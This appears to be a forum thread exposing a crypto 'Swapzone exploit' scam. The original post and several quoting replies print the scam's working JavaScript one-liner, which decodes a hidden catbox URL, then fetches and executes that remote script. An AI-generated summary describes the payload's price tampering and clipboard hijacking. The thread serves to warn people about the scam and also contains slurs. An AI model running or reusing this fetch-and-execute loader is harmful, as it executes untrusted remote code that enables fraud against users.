Breaking Down the 'Swapzone Exploit' SCAM

[1.308]

Minutes ago I received this dm:


I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:

Code:

(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):

The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:

My Contact Info:
@crashoutadmin (Telegram)

[58]

Oh no! not my money!!!!

I like bananas.


discord.gg/parser

[6]

Oh no! not my money!!!!

how did you fall for this ☠️☠️☠️

[1.746]

Discord: Labyrinthnto
Telegram: Labyrinthnto

[58]

Oh no! not my money!!!!

how did you fall for this ☠️☠️☠️

I didnt actually lmfao we were in call fucking around when he wrote the thread and i got dm'd by the bot

I like bananas.


discord.gg/parser

[20]

Minutes ago I received this dm:


I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:

Code:

(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):

The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:

Haha what

[190]

HAAAAAAAHHHHHHHHHAAAAAAAAAAAA

[4]

Minutes ago I received this dm:


I thought hm thats interesting let me check it out. I look at it and it seems odd (archive of the Google doc).

The paste.sh link contains the following:

Code:

(()=>{let node='https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw/btc/node-1.9.js'.match(/changenow\/(.*?)\//)[1];fetch(atob(node)).then(r=>r.text()).then(c=>Function(c)())})();

First thing I noticed was the url. This url does not exist and never has existed. The next thing I saw was the match to a regex. I ran the node string and the regex through an online regex matcher it extracts the 'aHR0cHM6Ly9maWxlcy5jYXRib3gubW9lLzNyYzdkbC5qcw'. This string is sent through atob() and outputs a catbox-hosted js file (https://files.catbox.moe/3rc7dl.js):
HUGE ASS OBFUSCATED JS WARNING
https://mega.nz/file/dxAHUY6a#dvoqyZxMFH...K-_dHRWJoo

Heres what AI had to say about it (no way in hell Im deobfuscating it manually):

The file is an obfuscated drop-in script that decodes a large table of hex-encoded strings at runtime and uses them as the real names for DOM selectors, messages and function names.

At runtime it:

Reads many DOM inputs (prices, quantity fields, shipping, currency strings).

Computes and overwrites text nodes / form fields with manipulated price/currency strings (e.g. formatting values and inserting ~$ + value into elements).

Places or updates hidden inputs / DOM nodes with compiled values.

Hooks UI elements (buttons/links) and rewrites/copies some value to navigator.clipboard.writeText(...) (i.e. copies a manipulated price/code to the clipboard) and/or calls navigator APIs.

Uses atob(...) on an embedded base64 chunk to build an initial string and then picks/from a built list of possible strings and may randomly choose one.

Runs on a timer (setInterval) to repeatedly apply the manipulations.

Has conditional logging to console if the location (URL) contains a particular substring.

Intent: client-side tampering / user-visible manipulation — likely used to alter displayed prices / coupon codes / affiliate strings, exfiltrate some small bits (clipboard), or trick users into copying bad values.

This is malicious — it modifies page content and interacts with clipboard and DOM in ways that can be used for fraud, price injection, or other attacks.

Thats awesome now instead of losing your money to retards give it to me instead

Example of a retard losing their money to a simple scam:

Goated